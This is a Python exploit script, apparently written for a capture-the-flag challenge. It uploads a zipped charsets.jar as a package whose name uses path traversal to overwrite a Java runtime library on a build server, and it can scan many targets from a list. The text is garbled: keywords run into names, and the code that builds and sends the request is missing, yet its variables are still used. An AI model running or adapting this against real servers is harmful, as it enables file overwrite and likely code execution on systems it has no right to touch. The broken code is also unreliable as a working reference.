defcreatePocFile(target, port): try: withopen('poc.txt', 'w') as f: f.write(f"Target: {target}\nPort: {port}\n") print("[+] POC file created successfully.") except Exception as e: print(f"[-] Error creating POC file: {e}")
defzipPocFile(): try: with zipfile.ZipFile('charsets.zip', 'w') as zipf: zipf.write('charsets.jar', compress_type=zipfile.ZIP_DEFLATED) print("[+] POC file zipped successfully.") except Exception as e: print(f"[-] Error creating ZIP file: {e}")
defzipToByteArray(zipFilePath): try: withopen(zipFilePath, 'rb') as zipFile: print("[+] ZIP file converted to byte array.") returnlist(zipFile.read()) except FileNotFoundError: print(f"[-] ZIP file not found: {zipFilePath}") returnNone except Exception as e: print(f"[-] Error reading ZIP file: {e}") returnNone
if __name__ == "__main__": logo() parser = argparse.ArgumentParser(description='Upload a package to the server.') parser.add_argument('-t', '--target', type=str,default="https://neptune-46711.nepctf.lemonprefect.cn", help='The target to scan (e.g., http://192.168.1.1).') parser.add_argument('-p', '--port', type=int, default=443, help='The port on the target (default: 80).') parser.add_argument('-r', '--repoName', type=str, default="local", help='The repository name (default: local).') parser.add_argument('-n', '--packageName', type=str, default="../../../../layers/paketo-buildpacks_bellsoft-liberica/jre/lib", help='The name of the package (default: ../../../poc).') parser.add_argument('-v', '--version', type=str, default="1.0.0", help='The version of the package (default: 1.0.0).') parser.add_argument('-f', '--file', type=str, help='A file containing a list of targets to scan in the format "http://target,port".')
args = parser.parse_args()
targets = []
if args.file: try: withopen(args.file, 'r') as f: targets = [line.strip().split(',') for line in f.readlines()] print("[+] Targets loaded from file.") except FileNotFoundError: print(f"[-] File not found: {args.file}") except Exception as e: print(f"[-] Error reading file {args.file}: {e}") elif args.target: targets = [(args.target, args.port)] else: print("[-] Please provide either a target with -t or a file with targets using -f.")
for target, port in targets: zipPocFile() packageFileAsBytes = zipToByteArray('charsets.zip') if packageFileAsBytes isNone: continue
try: if response.status_code == 500and"Package is expected to be unpacked, but it doesn't exist"in response.text: print(f"[+] Target {target} is vulnerable.") else: print(f"[-] Target {target} is not vulnerable.") print(f"[-] Status Code: {response.status_code}") print(f"[-] Response Body: {response.text}") print(f"[-] Request Body: {json.dumps(requestBody, indent=4)}") except Exception as e: print(f"[-] Error analyzing response from {url}: {e}")
try: os.remove('charsets.zip') print("[+] Cleanup successful.") print("") print("") except Exception as e: print(f"[-] Error cleaning up files: {e}") print("") print("")